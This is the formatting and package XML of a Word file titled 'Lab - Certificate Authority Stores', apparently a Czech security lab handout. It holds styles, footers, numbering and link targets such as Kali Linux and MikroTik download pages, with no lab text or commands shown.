        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>of</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:fldSimple w:instr=" NUMPAGES   \* MERGEFORMAT ">
      <w:r w:rsidR="00E00C31">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>8</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374957"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="773B2F50" w14:textId="2ED824FB" w:rsidR="00170541" w:rsidRDefault="00170541">
        <w:pPr>
          <w:pStyle w:val="Zpat"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="2B01D4D4" w14:textId="77777777" w:rsidR="00170541" w:rsidRDefault="0017054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3911251"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2C166623" w14:textId="3FC6CE62" w:rsidR="004F1A43" w:rsidRDefault="004F1A43">
        <w:pPr>
          <w:pStyle w:val="Zpat"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1A1BFF0D" w14:textId="52F21AFE" w:rsidR="00E00C31" w:rsidRPr="004F1A43" w:rsidRDefault="00E00C31">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="6983"/>
        <w:tab w:val="right" w:pos="10071"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="-12"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1544C" w14:textId="77777777" w:rsidR="00AF4DFE" w:rsidRDefault="00AF4DFE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2ABAF075" w14:textId="77777777" w:rsidR="00AF4DFE" w:rsidRDefault="00AF4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B0E18" w14:textId="77777777" w:rsidR="00E00C31"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C7B3E57" wp14:editId="1F1388EB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>667512</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>675132</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6438647" cy="27432"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="9139" name="Group 913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96" name="Shape 939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 style="width:506.98pt;height:2.15997pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:52.56pt;mso-position-vertical-relative:page;margin-top:53.16pt;" coordsize="64386,274">
              <v:shape id="Shape 939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proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>Lab</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve"> - </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>Certificate</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>Authority</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>Stores</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>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CB980" w14:textId="77777777" w:rsidR="00E00C31" w:rsidRDefault="00E00C3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6D89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5C6C216"/>
    <w:lvl w:ilvl="0" w:tplc="5852D2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8E4B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DC53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BE8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12A3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B896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22ADF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D420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80CA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0A309C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CB8078A"/>
    <w:lvl w:ilvl="0" w:tplc="B306740A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="777" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04050003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1497" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04050005" w:tentative="1">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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C065BB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9AC87BE"/>
    <w:lvl w:ilvl="0" w:tplc="138077C8">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2ADA">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CE00A0">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0A0F0A">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B8B69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0E704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D0854C">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BC8F24">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6892E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8B73C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDEBA12"/>
    <w:lvl w:ilvl="0" w:tplc="B372A5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1A6E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8C1B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064C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E469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8429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AA77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BCDC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2AE3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F37D18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5480A54"/>
    <w:lvl w:ilvl="0" w:tplc="791A40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B896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3E30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4273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E29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52A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26DC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2C20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C660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8D3FBE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7632C8DA"/>
    <w:lvl w:ilvl="0" w:tplc="086EE23A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"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FBF25CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E8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764CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B038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15894"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4487830"/>
    <w:lvl w:ilvl="0" w:tplc="2F007A44">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E06E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FE7B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58E3C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6C9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92006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766B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6435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8AC54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BFD73A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F752AFBC"/>
    <w:lvl w:ilvl="0" w:tplc="52E6C63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421D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64C0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0E752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FA010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3EA3C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8CFF9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B4F07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1E6A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72402102">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1292322210">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1059746071">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="79841361">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1912350091">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1374890141">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="478502154">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1058897472">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1815872901">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="419060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31"/>
    <w:rsid w:val="00022F94"/>
    <w:rsid w:val="0003401C"/>
    <w:rsid w:val="00066DC0"/>
    <w:rsid w:val="00092334"/>
    <w:rsid w:val="000E7683"/>
    <w:rsid w:val="00121D88"/>
    <w:rsid w:val="001673A0"/>
    <w:rsid w:val="00170541"/>
    <w:rsid w:val="001A1A9C"/>
    <w:rsid w:val="0023355F"/>
    <w:rsid w:val="002435D7"/>
    <w:rsid w:val="00256E3F"/>
    <w:rsid w:val="00257DB5"/>
    <w:rsid w:val="002C0F0B"/>
    <w:rsid w:val="00314A13"/>
    <w:rsid w:val="003337F8"/>
    <w:rsid w:val="00370D9C"/>
    <w:rsid w:val="003970B8"/>
    <w:rsid w:val="003E0DBB"/>
    <w:rsid w:val="004058E5"/>
    <w:rsid w:val="004508FB"/>
    <w:rsid w:val="00497EDB"/>
    <w:rsid w:val="004B43FA"/>
    <w:rsid w:val="004F1A43"/>
    <w:rsid w:val="0053694F"/>
    <w:rsid w:val="0057299E"/>
    <w:rsid w:val="00582222"/>
    <w:rsid w:val="005C048C"/>
    <w:rsid w:val="005D127F"/>
    <w:rsid w:val="006807F9"/>
    <w:rsid w:val="006825CF"/>
    <w:rsid w:val="006C48F6"/>
    <w:rsid w:val="006D037C"/>
    <w:rsid w:val="006E0066"/>
    <w:rsid w:val="00710158"/>
    <w:rsid w:val="0071545E"/>
    <w:rsid w:val="00733099"/>
    <w:rsid w:val="00746349"/>
    <w:rsid w:val="00762A52"/>
    <w:rsid w:val="007D3E45"/>
    <w:rsid w:val="00802F9E"/>
    <w:rsid w:val="00803F62"/>
    <w:rsid w:val="008051DB"/>
    <w:rsid w:val="00853A41"/>
    <w:rsid w:val="00871F40"/>
    <w:rsid w:val="008F0D71"/>
    <w:rsid w:val="00920038"/>
    <w:rsid w:val="00931F7E"/>
    <w:rsid w:val="00941DD4"/>
    <w:rsid w:val="009A75C7"/>
    <w:rsid w:val="009E2424"/>
    <w:rsid w:val="00A2150D"/>
    <w:rsid w:val="00A453E4"/>
    <w:rsid w:val="00A87B88"/>
    <w:rsid w:val="00A91846"/>
    <w:rsid w:val="00AD6C11"/>
    <w:rsid w:val="00AF4DFE"/>
    <w:rsid w:val="00B51300"/>
    <w:rsid w:val="00B52016"/>
    <w:rsid w:val="00B6791D"/>
    <w:rsid w:val="00BD76E3"/>
    <w:rsid w:val="00C10A72"/>
    <w:rsid w:val="00C663EA"/>
    <w:rsid w:val="00CC5E0D"/>
    <w:rsid w:val="00D12324"/>
    <w:rsid w:val="00DD6790"/>
    <w:rsid w:val="00DF1B59"/>
    <w:rsid w:val="00DF1F25"/>
    <w:rsid w:val="00DF7AF2"/>
    <w:rsid w:val="00E00C31"/>
    <w:rsid w:val="00E04885"/>
    <w:rsid w:val="00E076AB"/>
    <w:rsid w:val="00E51F84"/>
    <w:rsid w:val="00E53127"/>
    <w:rsid w:val="00E75122"/>
    <w:rsid w:val="00EC7947"/>
    <w:rsid w:val="00ED4DEF"/>
    <w:rsid w:val="00EE24CD"/>
    <w:rsid w:val="00EE7246"/>
    <w:rsid w:val="00F5032D"/>
    <w:rsid w:val="00F902C1"/>
    <w:rsid w:val="00FB4D6F"/>
    <w:rsid w:val="00FC06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E9F3"/>
  <w15:docId w15:val="{C8E7A1F7-9C6E-43C5-9D28-2BFF4B62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92334"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="109" w:line="252" w:lineRule="auto"/>
      <w:ind w:left="368" w:hanging="11"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EE7246"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="39" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00066DC0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="123" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="11" w:hanging="11"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Courier New"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009A75C7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>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uiPriority w:val="9"/>
    <w:rsid w:val="00066DC0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Courier New"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis1Char">
    <w:name w:val="Nadpis 1 Char"/>
    <w:link w:val="Nadpis1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EE7246"/>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Zpat">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="ZpatChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F1A43"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ZpatChar">
    <w:name w:val="Zápatí Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Zpat"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004F1A43"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Styl1">
    <w:name w:val="Styl1"/>
    <w:basedOn w:val="Nadpis2"/>
    <w:next w:val="Nadpis2"/>
    <w:qFormat/>
    <w:rsid w:val="004F1A43"/>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Obsah1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F1A43"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hypertextovodkaz">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F1A43"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Obsah2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F1A43"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titulek">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FB4D6F"/>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FB4D6F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis3Char">
    <w:name w:val="Nadpis 3 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009A75C7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Sledovanodkaz">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00370D9C"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zhlav">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="ZhlavChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00497EDB"/>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497EDB"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Obsah3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0071545E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odstavecseseznamem">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normln"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00871F40"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FormtovanvHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="FormtovanvHTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00802F9E"/>
    <w:pPr>
      <w:spacing w:before="0"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802F9E"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Arial"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0573">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="126365021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="287441453">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="539630429">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="696856038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="904410819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148089445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="177893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li.org/get-kali/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mikrotik.com/download" TargetMode="External"/><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7.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hyperlink" Target="http://www.victim.com"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ikrotik.com/downloa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buntu.com/download/server"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www.victim.com" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpe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1DEED-E509-40C2-98A9-253081DD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13</Pages>
  <Words>2688</Words>
  <Characters>15862</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>132</Lines>
  <Paragraphs>37</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Název</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Lab - Certificate Authority Stores</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Certificate Authority Stores</dc:title>
  <dc:subject/>
  <dc:creator>SP</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Martin Smékal</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-03T21:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-12T21:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>